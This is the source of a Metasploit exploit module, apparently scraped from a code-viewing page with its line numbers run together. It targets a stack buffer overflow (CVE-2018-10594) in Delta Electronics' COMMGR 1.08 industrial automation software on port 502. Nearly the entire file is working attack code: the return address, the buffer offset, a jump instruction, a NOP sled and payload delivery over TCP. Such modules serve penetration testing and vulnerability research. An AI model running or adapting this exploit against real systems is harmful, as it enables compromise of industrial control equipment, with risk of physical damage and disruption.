Path: blob/master/modules/exploits/windows/scada/delta_ia_commgr_bof.rb
19721 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',15'Description' => %q{16This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial17Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially18crafted packets. This module has been tested successfully on Delta Electronics Delta19Industrial Automation COMMGR 1.08 over20Windows XP SP3,21Windows 7 SP1, and22Windows 8.1.23},24'Author' => [25'ZDI', # Initial discovery26't4rkd3vilz', # PoC27'hubertwslin' # Metasploit module28],29'References' => [30[ 'CVE', '2018-10594' ],31[ 'BID', '104529' ],32[ 'ZDI', '18-586' ],33[ 'ZDI', '18-588' ],34[ 'EDB', '44965' ],35[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]36],37'Payload' => {38'Space' => 640,39'DisableNops' => true,40'BadChars' => "\x00"41},42'DefaultOptions' => {43'EXITFUNC' => 'thread',44},45'Platform' => 'win',46'Targets' => [47[48'COMMGR 1.08 / Windows Universal',49{50'Ret' => 0x00401e14, # p/p/r COMMGR.exe51'Offset' => 416452}53],54],55'DisclosureDate' => '2018-07-02',56'DefaultTarget' => 0,57'Notes' => {58'Reliability' => UNKNOWN_RELIABILITY,59'Stability' => UNKNOWN_STABILITY,60'SideEffects' => UNKNOWN_SIDE_EFFECTS61}62)63)6465register_options(66[67Opt::RPORT(502)68]69)70end7172def exploit73data = rand_text_alpha(target['Offset'])74data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled75data << [target.ret].pack("V")76data << make_nops(40)77data << payload.encoded7879print_status("Trying target #{target.name}, sending #{data.length} bytes...")80connect81sock.put(data)82disconnect83end84end858687